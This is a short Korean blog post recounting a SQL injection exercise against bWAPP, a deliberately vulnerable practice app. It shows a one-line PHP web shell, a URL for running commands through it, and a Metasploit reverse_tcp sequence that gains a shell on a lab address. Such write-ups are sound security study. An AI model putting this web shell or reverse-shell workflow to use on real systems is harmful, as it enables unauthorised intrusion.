카테고리 없음

bWAPP을 이용한 SQL 실습

작성자 - 재감자숭

옛 기억을 살려 bWAPP을 이용한 SQL  Injection 실습을 다시 진행해보았다. 너무 오랜만에 진행해서 그런지 처음엔 좀 헤맸는데 하다보니 잊고 있던 것들을 떠올릴 수 있는 시간이였다.

 

공격 시나리오

 

SQL Injeciton 페이지의 취약점을 이용하여 SQL query문을 조작하고 교재에 나와 있는 SQL Injection을 사용하여 페이로드를 작성

DBMY SQL로 설정되어 있어 #을 사용하고

페이로드를 살펴보면 중간에 PHP 코드가 들어간 것을 확인

<?php system($_GET[‘cmd’]) ?>

 php언어를 사용하여 페이로드 사이에 시스템 함수를 삽입

 파라미터 값으로 위 코드로 인젝션을 시도하면 파일업로드가 실행하고 디렉토리 리스팅 취약점을 활용하여 성공여부를 확인, 디렉토리 리스팅은 bWAPP 홈페이지 url 주소에서 맨 마지막 페이지 부분을 /images로 수정하여 확인

sqli.php 실행 시켜 예제된 코드를 동작 할 수 있도록 한다.

bWAPP/images/sqli.php?cmd=ls al

url 주소를 위와 같이 바꾼다

 

그림과 같이 리눅스 상에 명령어가 웹에서 동작되는 것을 확인

msfconsole 명령어를 입력하여 실행

- sqli.rb 파일을 사용하여 익스플로잇을 시도

 - reverse_tcp를 서버와의 연결을 시도

- 서버는 RHOST를 사용하여 192.168.40.142SET

- exploit 명령어를 입력하여 공격를 시행

- 기존에 SET해두었던 주소를 타겟으로 연결 성공 여부 정보를 출력

shell 명령어를 실행하여 공격자가 타겟 서버에 대한 쉘 권한을 취득

ls al 명령어를 실행하면 위와 같이 msf을 활용한 공격이 정상적으로 수행되는 것을 확인 가능

 

 

 
 

 

Contents

이 글이 도움이 되었다면, 응원의 댓글 부탁드립니다.